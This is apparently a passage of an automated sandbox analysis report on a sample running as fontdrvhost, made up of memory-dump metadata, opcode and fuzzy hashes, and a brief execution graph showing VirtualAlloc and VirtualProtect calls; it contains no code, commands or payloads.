                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eda37f5a71ef9d6abfb522fdcd4f1be2120cb5ad074b452d1a95ec35805b8fbb
                                                                    • Instruction ID: ad70b7f0453b2c472c38b9f71293bfd0decb606d116b5e38b7e53b4a68d977fe
                                                                    • Opcode Fuzzy Hash: eda37f5a71ef9d6abfb522fdcd4f1be2120cb5ad074b452d1a95ec35805b8fbb
                                                                    • Instruction Fuzzy Hash: 54011730A0556A8EEB64EB18C8587E9B7B1EB44315F1082F5941DA22A9DA742E85CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c6c330b346ef2d58b532aa9d458e79c11696b0cd131a1d5015f62c7120a330bc
                                                                    • Instruction ID: 1da46ab1808b1c98a10b486f5b064817a20cacaf2c24a1efa84e131ead561625
                                                                    • Opcode Fuzzy Hash: c6c330b346ef2d58b532aa9d458e79c11696b0cd131a1d5015f62c7120a330bc
                                                                    • Instruction Fuzzy Hash: 4AF03030E1560EAFEB50EFA8D4596ED7BE4FF54315F114537E41CC21A0DA7566908780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4d66a6791a6e0518b251df3bcc2ab13295a0f509cc9937d2c9b475ac698c97a5
                                                                    • Instruction ID: f6fcd3822f51caf706fcc5706a46c04c2f8794202a2f82574c8fc5060bfed5ba
                                                                    • Opcode Fuzzy Hash: 4d66a6791a6e0518b251df3bcc2ab13295a0f509cc9937d2c9b475ac698c97a5
                                                                    • Instruction Fuzzy Hash: C1F01230D1564D9FDB90EFA4C4496EA7BE0FF14304F014466E81CD2160DA74A6A0CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 20ca368dbdebafa6f2847212a4e8fe4ccd20555cba187c5e0699008305c5604e
                                                                    • Instruction ID: 22f83177245e1b8bc77db380529c7760c0575970f6a3946ddc3a1f24b15b04b7
                                                                    • Opcode Fuzzy Hash: 20ca368dbdebafa6f2847212a4e8fe4ccd20555cba187c5e0699008305c5604e
                                                                    • Instruction Fuzzy Hash: 9CF01530509A0ECFDF90EF68C944AAA37A1FF29300F000165F45DC31A4CB70EAA0CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 51656e1e349ffeb4c6151966cb611ee3d4930c60049d44a7b6720c6a7319dba0
                                                                    • Instruction ID: 16a7498743122a857a47258eba75508afe5a92e5f404c02510a09e5076aafcaa
                                                                    • Opcode Fuzzy Hash: 51656e1e349ffeb4c6151966cb611ee3d4930c60049d44a7b6720c6a7319dba0
                                                                    • Instruction Fuzzy Hash: 6FE0C210B0A24722FE3014E24C6D8BF2E39CF937C5F100639F00D1308AFE982803B2A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 25412e8a99d30e0f632988ef88b82f8f3fa1083cd54197db5ade967f506e7e87
                                                                    • Instruction ID: b3f9949a69987fb322e98eb811675a2b2da37d9da5e26a438a6d1b20371dbafe
                                                                    • Opcode Fuzzy Hash: 25412e8a99d30e0f632988ef88b82f8f3fa1083cd54197db5ade967f506e7e87
                                                                    • Instruction Fuzzy Hash: 2CE09A3181D38A8BD7619B6888B64EC7B30AF00340F5802EAF90C46186FB246618A642
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^$^^$^^$^^$^^$^^$^^$^^$^^
                                                                    • API String ID: 0-4142995909
                                                                    • Opcode ID: cace15e04305a79683012b1c1cf1220d9ebd4702cbd5b97724fc3d84defc1a8e
                                                                    • Instruction ID: 5b4d96e6c7b45b2f628f48de49ef7c47d9bcb9251fe6099d15364e7aee9f3750
                                                                    • Opcode Fuzzy Hash: cace15e04305a79683012b1c1cf1220d9ebd4702cbd5b97724fc3d84defc1a8e
                                                                    • Instruction Fuzzy Hash: F1C16813B0D2A356F71277ACA8F58E66FE09F022A8B1946F7F4DE4D0D3AD0E294D4185
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^$^^$^^$^^$^^$^^$^^
                                                                    • API String ID: 0-3751555822
                                                                    • Opcode ID: 8bc28a803eb6cdd4c7b2c049a1173e7b25fa30ac99da2cc4cba8b5e5ed0dc3c8
                                                                    • Instruction ID: 1970be964308de32186457d962ae8a906293591d3ec01484213dbb04b6b5c8f6
                                                                    • Opcode Fuzzy Hash: 8bc28a803eb6cdd4c7b2c049a1173e7b25fa30ac99da2cc4cba8b5e5ed0dc3c8
                                                                    • Instruction Fuzzy Hash: 3B513852B0D2A316F71677BCA8F6CE62FE08F11268B0942F3E4DE490D3AD0F24994585
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^$^^$^^$^^
                                                                    • API String ID: 0-2660549292
                                                                    • Opcode ID: d78542ff4fa670b014a32bd94082195b3f9fa796e1e22571a2ae76c6759acc88
                                                                    • Instruction ID: cf0b8fec7d51771eb3b7151afc4012aa5d34bdd0875b2d3fb7e017b68a521f55
                                                                    • Opcode Fuzzy Hash: d78542ff4fa670b014a32bd94082195b3f9fa796e1e22571a2ae76c6759acc88
                                                                    • Instruction Fuzzy Hash: E6617A43B0D7A315F76273BC24B28E56FA08F126A4B0D46F7E5DE490D76D0A284E5285
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:5.5%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:6
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 14869 7ffd9ba2201e 14870 7ffd9ba2202d VirtualProtect 14869->14870 14872 7ffd9ba2216d 14870->14872 14865 7ffd9ba23a0d 14866 7ffd9ba23a2f VirtualAlloc 14865->14866 14868 7ffd9ba23b45 14866->14868

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: jV_H
                                                                    • API String ID: 0-1489637952
                                                                    • Opcode ID: d288f46504e238a1e393a302cd0698cdc9b2ab7f04c42c04f92a8905205c2778
                                                                    • Instruction ID: 2072bc77053b31bcf0cb3eef97c15a0fea168c6cd5f1e7080c4b15683664611d
                                                                    • Opcode Fuzzy Hash: d288f46504e238a1e393a302cd0698cdc9b2ab7f04c42c04f92a8905205c2778
                                                                    • Instruction Fuzzy Hash: 68B2FB70E09A1D8FDBA8EF58C8A5AA9B7B1FB58300F5041E9D40DD3296DE756E81CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba10000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d89593a328486b66078c57e7823f3db8d5030b1894d80d1f51838a9379d96b63
                                                                    • Instruction ID: 4b8b14f1551fe4f535e9d5a101ca9308bce37d6fa560b9650420e3d148cf2952
                                                                    • Opcode Fuzzy Hash: d89593a328486b66078c57e7823f3db8d5030b1894d80d1f51838a9379d96b63
                                                                    • Instruction Fuzzy Hash: 6AA1CE71A0DA8D8FE7A8EB68C8657E97BE1FF55310F0002BAD049D72E6CB792811C714
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^V_H
                                                                    • API String ID: 0-662928822
                                                                    • Opcode ID: 20db5b18fb26e3bc2e394c31b0bcf39591407d23fe9079a041fda2130f7db1d6
                                                                    • Instruction ID: 5df2d6b1043a778f946450668a867e791b5995ae35d7818e2328e78865236dd5
                                                                    • Opcode Fuzzy Hash: 20db5b18fb26e3bc2e394c31b0bcf39591407d23fe9079a041fda2130f7db1d6
                                                                    • Instruction Fuzzy Hash: C9522D71E5A92D8FDBA4EB5888A57E8B7F1FB58300F4401F9D04D93292DA786E81CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 448 7ffd9ba2201e-7ffd9ba2202b 449 7ffd9ba2202d-7ffd9ba22035 448->449 450 7ffd9ba22036-7ffd9ba22047 448->450 449->450 451 7ffd9ba22052-7ffd9ba2216b VirtualProtect 450->451 452 7ffd9ba22049-7ffd9ba22051 450->452 457 7ffd9ba2216d 451->457 458 7ffd9ba22173-7ffd9ba221c3 451->458 452->451 457->458
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA1F000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba1f000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 437b0cf27f1402a76d068fb825104d1fb83e819bd73e5a23a2583a8741b64b47
                                                                    • Instruction ID: decd4e8e4958f0e66dfbd15c1a8fd0486b47a055c7627438048a523aaae367dc
                                                                    • Opcode Fuzzy Hash: 437b0cf27f1402a76d068fb825104d1fb83e819bd73e5a23a2583a8741b64b47
                                                                    • Instruction Fuzzy Hash: 3A517D30D0974D8FDB54DFA8C885AEDBBF1FB6A310F10426AD449E7256DB74A885CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 461 7ffd9ba23a0d-7ffd9ba23b43 VirtualAlloc 466 7ffd9ba23b45 461->466 467 7ffd9ba23b4b-7ffd9ba23baf 461->467 466->467
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA1F000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba1f000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 4086384b7e09648d90470e67ae09543c18db0fe9f5bc8ada959aaac9b8e4c90c
                                                                    • Instruction ID: d5509000d1ad6838a3a238e64c78fc94df7f9c946bd2553418ff02f5fc5585a2
                                                                    • Opcode Fuzzy Hash: 4086384b7e09648d90470e67ae09543c18db0fe9f5bc8ada959aaac9b8e4c90c
                                                                    • Instruction Fuzzy Hash: F5514D74908A5C8FDF94EF58C885BE9BBF1FB69310F1041AAD04DE3255CB71A9858F40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 471 7ffd9ba26761-7ffd9ba2678a 473 7ffd9ba26794-7ffd9ba267ac 471->473 474 7ffd9ba267b7-7ffd9ba267be 473->474 475 7ffd9ba267de-7ffd9ba26f21 474->475 476 7ffd9ba267c0-7ffd9ba26cdb 474->476 475->474 476->474 483 7ffd9ba26ce1-7ffd9ba26ceb 476->483 483->474
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba26000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *
                                                                    • API String ID: 0-163128923
                                                                    • Opcode ID: 875c773fc31e80eaa2fc80a47191f9681ada53b299b17ddb9c974e275b8731b8
                                                                    • Instruction ID: fb9ea4a3083aaa8c51b1c9cf815025559279275a9cd1c78ba2d3b8bc96e693f2
                                                                    • Opcode Fuzzy Hash: 875c773fc31e80eaa2fc80a47191f9681ada53b299b17ddb9c974e275b8731b8
                                                                    • Instruction Fuzzy Hash: 8311A570E5A51D8FEBB8DB48D8A4BE8B7A1FB58304F1001E9D10ED2295CA786B818B55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 484 7ffd9ba2684d-7ffd9ba26856 486 7ffd9ba26861-7ffd9ba26880 484->486 487 7ffd9ba267b7-7ffd9ba267be 486->487 488 7ffd9ba267de-7ffd9ba26f21 487->488 489 7ffd9ba267c0-7ffd9ba26cdb 487->489 488->487 489->487 496 7ffd9ba26ce1-7ffd9ba26ceb 489->496 496->487
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba26000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *
                                                                    • API String ID: 0-163128923
                                                                    • Opcode ID: 9ecdeb18057becfe9f1ec89054307b1c2350af4d17ce54e14a77853ad85f5028
                                                                    • Instruction ID: 670cd8a7d7444da464fb3e5de28c011d638adc880219aa4e689435dcdd04400e
                                                                    • Opcode Fuzzy Hash: 9ecdeb18057becfe9f1ec89054307b1c2350af4d17ce54e14a77853ad85f5028
                                                                    • Instruction Fuzzy Hash: F7F05E71E4941E8FEB3DDF08C8647E8B3A1EF64310F1542F9D10D922A4DB786B858B51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ae5cd188c6bf255d33ed579536ccd0eee3b2ccf5ee1ca933e35a4f550512b1c0
                                                                    • Instruction ID: f1d504e216a979ffabec8080d6fbf886b6dd2e2b66de80d8d2eecac4957f64a2
                                                                    • Opcode Fuzzy Hash: ae5cd188c6bf255d33ed579536ccd0eee3b2ccf5ee1ca933e35a4f550512b1c0
                                                                    • Instruction Fuzzy Hash: 56F17171E2965D8FDBA8EB98C4A5BACB7B1FF54300F4541B9D04DD3292CEB46A84CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe9c590340ad6540c78634df0d1555aca33563381587206efccd6bb2cee4d2ff
                                                                    • Instruction ID: dde895a877d66d1d1a84068f51615e60cac2509a98511d5e7a5dd325a953e785
                                                                    • Opcode Fuzzy Hash: fe9c590340ad6540c78634df0d1555aca33563381587206efccd6bb2cee4d2ff
                                                                    • Instruction Fuzzy Hash: E1516C70E0A64D8FEB69DF94C8A47EC77B1FB58301F5101BAD009D72A5DBB86A85CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1083 7ffd9ba28b09-7ffd9ba28b54 1085 7ffd9ba28b56 1083->1085 1086 7ffd9ba28b5b-7ffd9ba28b61 1083->1086 1085->1086 1087 7ffd9ba28c35-7ffd9ba28c3b 1086->1087 1088 7ffd9ba28c41-7ffd9ba28c4a 1087->1088 1089 7ffd9ba28b66-7ffd9ba28b9c 1087->1089 1091 7ffd9ba28ba2-7ffd9ba28c0f 1089->1091 1096 7ffd9ba28c2d-7ffd9ba28c32 1091->1096 1097 7ffd9ba28c11-7ffd9ba28c1a 1091->1097 1096->1087 1097->1096 1098 7ffd9ba28c1c-7ffd9ba28c2c 1097->1098
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA28000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba28000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d27b5622238290f82de414551dd3ce0e43f05951a7ad42b9dc8ac687f7f21658
                                                                    • Instruction ID: 37cc76f8f67e9b4998d7278ecc8276da5469c6945bc6a00c3c12513269e74964
                                                                    • Opcode Fuzzy Hash: d27b5622238290f82de414551dd3ce0e43f05951a7ad42b9dc8ac687f7f21658
                                                                    • Instruction Fuzzy Hash: 0C519070A09A4D9FCF84EF58D494AED7BF1FF58315B0501AAE409E7261D774E990CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba10000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 76693cc843499dff62b5017cd0e78a36ea2667865f68f9e5256d12c8d45ca85e
                                                                    • Instruction ID: 0015dcbb381fda84d3b28bcfa7c46fc5af2033f5cbe50824ece119b1b77b4da9
                                                                    • Opcode Fuzzy Hash: 76693cc843499dff62b5017cd0e78a36ea2667865f68f9e5256d12c8d45ca85e
                                                                    • Instruction Fuzzy Hash: CD4187B0A0492C8FDBA4DF18C894BE9B7F0EB68305F1041EAD10EE3295DB756AC48F45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0021aa7cbee3fb0d9d03a03f20f1bd0361a3a8f2401bd12223807bb16167c28f
                                                                    • Instruction ID: 9126a1ff75d8f1c3892f89cd9c7b08198a138f49c340b25df246f8b5b22b67bf
                                                                    • Opcode Fuzzy Hash: 0021aa7cbee3fb0d9d03a03f20f1bd0361a3a8f2401bd12223807bb16167c28f
                                                                    • Instruction Fuzzy Hash: 7E419F70A0A64DCFEBA5EB64C4A97A87BB1FF15310F0541B6D40DC32E2DE786A84CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c873852c8cfef55c667f62d94f119e98de557d4a1abfe4185f9f3c2a3d40ec8
                                                                    • Instruction ID: 66478cf962063eeeff441577007afc17ba8758fa8b749d4fedaa206c34de4ab6
                                                                    • Opcode Fuzzy Hash: 6c873852c8cfef55c667f62d94f119e98de557d4a1abfe4185f9f3c2a3d40ec8
                                                                    • Instruction Fuzzy Hash: 4A310832A0965E8FDB55FFACD8E59E97BE0FF11318B0802B7D459CA092DE31A445C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba10000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: feadd5f3ed811bf746adad8455719fb3a8b096feebf0be681ac67250bf3655ec
                                                                    • Instruction ID: 284e728ef956570969c66901c45aebbcb0aa434e0f65fd9909cf090360536080
                                                                    • Opcode Fuzzy Hash: feadd5f3ed811bf746adad8455719fb3a8b096feebf0be681ac67250bf3655ec
                                                                    • Instruction Fuzzy Hash: A2315B35B0E68E8BE771ABA8C8212FDB760EF41310F05567BC495971E2CBB82605CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA28000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba28000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1ddbbd2381e3bfdc8ca596a819513303e729034da7161904b9e12ab6aaba651
                                                                    • Instruction ID: 7432a3b4b7dfb934ba99c2b2c40ec20674abcfedb05fe8c63557558ba2b7220b
                                                                    • Opcode Fuzzy Hash: c1ddbbd2381e3bfdc8ca596a819513303e729034da7161904b9e12ab6aaba651
                                                                    • Instruction Fuzzy Hash: E5318E30A1964D8FDB54DF58C8A5AEE7BF1FF58314F06026AE849E3291CB74E940CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2cca38ddba03cf9a8ec44b1f2999655855ec486fefb1f535384a4a76a8ac47b4
                                                                    • Instruction ID: 28763b2d05daa8eab81669e8eb38d7a9ee5e4684f6d49285fe157c3648bbc719
                                                                    • Opcode Fuzzy Hash: 2cca38ddba03cf9a8ec44b1f2999655855ec486fefb1f535384a4a76a8ac47b4
                                                                    • Instruction Fuzzy Hash: 95315C70E19A4D8FDB94EFD8C4A5AACBBF1FF58301F450179D409D32A5DAB46981CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba10000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0b5a0baa8f5dd338e358dc8ff2bc3a874cf52208aca2c85c73d9bb3487e437ad
                                                                    • Instruction ID: 6efc48f67c9d504063f17ccf513f404440c484986cf579aaf627afe47f80fdff
                                                                    • Instruction Fuzzy Hash: FD01A870914A4D9FDF84EF68C849AEE7BF0FB68305F00056AA85DD3264DB71E594CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f092b89cb36c470110e2aa4a73b53a619a30db169a6878e3e6debd28dee1610f
                                                                    • Instruction ID: 134b87ba6a565abfffa0aa259eb8f5ddc57c55e139c938a92775c8563c4d24c2
                                                                    • Opcode Fuzzy Hash: f092b89cb36c470110e2aa4a73b53a619a30db169a6878e3e6debd28dee1610f
                                                                    • Instruction Fuzzy Hash: 7801A870914A4D9FDF84EF68C849AEE7BF0FB68305F00056AA85DD3260DB71E694CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
